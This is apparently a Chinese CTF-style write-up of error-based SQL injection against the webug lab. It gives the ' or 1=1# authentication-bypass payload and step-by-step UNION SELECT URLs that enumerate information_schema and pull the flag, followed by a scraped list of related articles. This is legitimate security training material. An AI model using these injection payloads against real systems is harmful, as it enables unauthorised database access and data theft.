一、实验所需函数
1. concat(str1,str2,...)返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL
2. concat_ws(separator, str1, str2, ...) 含有分隔符连接字符串,第一个参数为制定的分隔符
3. group_concat(str1,str2,...)连接一个组的所有字符串,并以逗号分隔每一条数据
4.union 用于合并两个或多个select语句的结果集,需要注意的是union内部的select须拥有相同数量的列,且列的数据类型也要相同。
5.逻辑顺序true and false or true结果为true这样可以构造万能密码Select * from admin where username=’admin’and password=’’or 1=1#’
6. 注释掉后面内容时可用 --+ 或者 # 后者在浏览器中会进行url编码为%23
二、实验步骤
1、在webug里面打开显错注入靶场。然后在id=1后面加单引号后返现返回报错了

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1'


2、通过构造语句‘ or 1=1%23发现返回hello回显,说明此处存在注入点。

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' or 1=1%23


3、利用order by判断字段个数,从1开始发现显示正常,尝试到3时页面报错,因此判断字段个数为2个。

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' order by 1%23



4、通过联合查询法查询数据库库名

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' union select 1,group_concat(schema_name) from information_schema.schemata%23


5、通过上一步联合查询法我们得到靶场上存在的数据库库名,接下来我们查看一下webug这个数据库里面存在哪些表。

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23


6、通过查询webug这个数据库发现里面有flag表,然后在查看flag表里面存在哪些表项。

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' %23

7、通过查询flag表发现表里存在2个表项分别是id和flag,最后查看一下flag表项的内容得到flag值为:dfafdasfafdsadfa

http://webug.xxxxxx.com/control/sqlinject/manifest_error.php?id=1' union select 1,flag from webug.flag %23


三、打开靶场提交flag,显示flag正确

PS:感兴趣的朋友可以移步林三岁网络安全实验室论坛获取在线靶场环境。

文章转自:林三岁网络安全实验室

转载请注明出处:https://bbs.linsansui.cn/thread-40-1-1.html

网络安全之webug显错注入实战相关推荐

  1. webug————显错注入

    1.打开靶场,寻找注入点进行测试 id=1 2.输入':":),进行判断查看是否报错 输入":)页面无变化,'出现报错,说明存在SQL注入 3.注入流程 :寻找注入点->构造 ...

  2. webug 4.0 第一关 显错注入

    感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为"我们的漏洞"靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网 ...

  3. Webug靶场之旅——显错注入

    显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作. SQL注入漏洞产生的条件: 1.用户能够控 ...

  4. sql显错注入靶机演示

    sql注入漏洞作为web层面最高危的漏洞之一,本文将手动演示sql显错注入的整体流程 注:禁止用于实战 那么开始正文部分,首先打开我们的靶场猫舍 http://cntj8003.ia.aqlab.cn ...

  5. MYSQL注入-显错注入

    MYSQL注入-显错注入 原理:将插入的数据当作数据库代码执行. 1.首先我们看到页面要判断是否存在注入 2.用 and 1=1 无变化 ; and 1=2 发现有变化,说明可能存在注入 3.对字段进 ...

  6. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  7. 什么是mysql显错注入_十种MYSQL显错注入原理讲解(三)

    这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病.下面我继续讲解. 1.multipolygon() select * from test where id=1 and multipolygon( ...

  8. mysql跨年统计年前年后_十种MYSQL显错注入原理讲解(三)

    这回间隔时间有点长了,年前年后忙的头晕眼花,外加大病.下面我继续讲解. 1.multipolygon() select * from test where id=1 and multipolygon( ...

  9. mysql报错注入实战_MySQL手工注入实战

    实战记录,日本某站 注入点 and 语句测试 and1=1 返回正常,and=2跳回首页,可能过滤了 用 ' 测试返回错误页面 判断为注入点 order by语句查询字段数 测试字段数为9 and 1 ...

最新文章

  1. BAT数据披露:缺人!110万AI人才缺口,两者矛盾,凉凉了!
  2. C~K的班级_JAVA
  3. docker nacos
  4. chosen jquery ajax搜索,基于chosen插件实现人员选择树搜索自动筛选功能
  5. android用sax解析xml,Android:采用SAX解析XML实例
  6. 无法定位程序输入点 except_python自制王者荣耀抽卡程序
  7. matlab画x的1 3次方图像,Y=X的3次方的图像)
  8. 深度学习《InfoGAN模型》
  9. 白盒测试 语句覆盖、判定覆盖、条件覆盖、判定条件覆盖、条件组合覆盖、路径覆盖
  10. 社会统计分析—基础知识
  11. 如何使用计算机文件共享,两台电脑如何共享文件?【步骤图解】
  12. w10打开网络计算机退出,Win10网络发现已关闭怎么办?|Win10启用网络发现方法
  13. Java银联在线网关支付测试总结
  14. xp系统关闭闲置服务器,教你win10系统空闲进程占用cpu怎么关闭
  15. AltiumDesigner快捷键——SCH和SCHLIB编辑快捷键
  16. 程序媛为了万圣节PARTY可谓是别出心裁,她居然cos了一只bug
  17. 多媒体图像切换与中值区分法
  18. html网站设计基础
  19. Shiro基础应用——角色和权限校验
  20. NFT 游戏含义:游戏中的 NFT 是什么?

热门文章

  1. 服务器信息备份更新,电子病历服务器双机更换及实时备份与HIS服务器升级改造合同备案...
  2. Python保姆级教程.pdf,太全了!
  3. 零入门kubernetes网络实战-3->Underlay网络与Overlay网络总结
  4. Codeforces Round #503 (by SIS, Div. 2) D. The hat(交互题)
  5. vs qt 无法打开包括文件: “QtCore/qconfig.h”
  6. php 上传文件 重命名_如何用PHP给上传的文件改名
  7. 【信号检测】基于matlab自适应滤波法微弱信号检测【含Matlab源码 2308期】
  8. Tracker 服务器源码分析之四:Tracker 类
  9. i.MX6网卡驱动程序fec.c的分析(AR8035网卡驱动程序的详细分析)之二
  10. CentOS安装nvidia显卡驱动